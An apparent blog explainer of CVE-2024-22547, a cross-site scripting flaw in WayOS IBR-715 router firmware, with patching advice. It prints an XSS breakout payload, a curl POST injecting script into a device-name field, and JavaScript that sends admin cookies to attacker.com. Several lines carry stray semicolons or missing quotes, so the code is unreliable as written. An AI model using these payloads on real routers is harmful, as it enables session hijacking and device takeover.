CVE-2024-22547 - WayOS IBR-715 (<17.06.23) Cross-Site Scripting (XSS) Vulnerability Exploited – Explainer & Proof

The world of network devices is often overlooked in the cyber security discussion, but real consequences follow when routers and gateways expose vulnerabilities to malicious actors. One such vulnerability is CVE-2024-22547, affecting the popular WayOS IBR-715 router on firmware versions lower than 17.06.23. In this deep-dive, I’ll walk you through what this vulnerability is, show some code examples, reference original advisories, and demonstrate how this XSS can be exploited in practice.

What is CVE-2024-22547?

CVE-2024-22547 is a *Cross-Site Scripting* (XSS) weakness in WayOS IBR-715 routers running on firmware below v17.06.23. Unsanitized user input is reflected and executed in the management interface's web browser. This lets attackers inject malicious scripts, potentially stealing session cookies, redirecting users, or manipulating router configurations.

Why Does XSS Matter Here?

XSS allows a remote attacker to execute JavaScript inside an administrator’s browser. If an admin logs into the router’s web interface and visits a maliciously crafted URL (or views manipulated log data), the attacker may gain access to:

How the Vulnerability Works

The vulnerable router fails to sanitize certain URL parameters or POST inputs. If you pass JavaScript code to these fields, the browser executes it as part of the page.

Here’s a conceptual overview

- A user-submitted field, say, a hostname, is echoed on a web form without being escaped or filtered.
- An attacker sets a value as <script>alert('XSS!')</script>

Example Vulnerable Request & Payload

Suppose the router’s admin page allows adding/editing devices, and your device name field is being reflected into HTML like so:

<input type="text" name="devicename" value="<UNSANITIZED_VALUE_HERE>">

Malicious Input Example

"><script>alert('XSS!')</script>

Send this as your device name. The web UI reflects it unsanitized

<input type="text" name="devicename" value=""><script>alert('XSS!')</script>">

When the admin loads the page, JavaScript executes — popping an alert or doing worse.

Complete Proof-of-Concept (PoC)

You can exploit this XSS by directly submitting a POST request or via a crafted link. Here’s a simple curl example for a POST field (replace the URL with your management panel):

curl -k -X POST "https://ROUTER_IP/add_device"; \
  -d 'devicename="><script>fetch(//attacker.com/?cookie=+document.cookie)</script>'

*This payload would exfiltrate admin session cookies to the attacker’s domain.*

If you succeed, your malicious JS runs in the admin's browser

// Steal router admin cookie to attacker
fetch('https://attacker.com/steal?c='; + document.cookie);

// Modify page HTML or submit forms
document.body.innerHTML = "Hacked by XSS";

Real-World Scenarios

- Session Hijack: The attacker's script grabs the session cookie, letting them log in as the admin.

Router Takeover: Automated scripts can change DNS settings, routing traffic to malicious sites.

- Lateral Movement: Credentials or network topologies exposed enable an attacker to pivot throughout the network.

Official References

- NVD Summary for CVE-2024-22547
- Exploit Database (see future updates)
- Vendor advisory (check WayOS official site for firmware and bulletins)

Final Thoughts

Vulnerabilities like CVE-2024-22547 prove that router security matters at every level. Whether you're an SMB using the WayOS IBR-715 or a home user, keep your firmware current and watch out for suspicious web requests in your network’s admin interfaces.

Stay patched. Stay vigilant.

If you need tips patching your firmware or want in-depth guidance on securing your network device, drop a comment below!

Timeline

Published on: 02/22/2024 19:15:08 UTC
Last modified on: 08/14/2024 16:35:04 UTC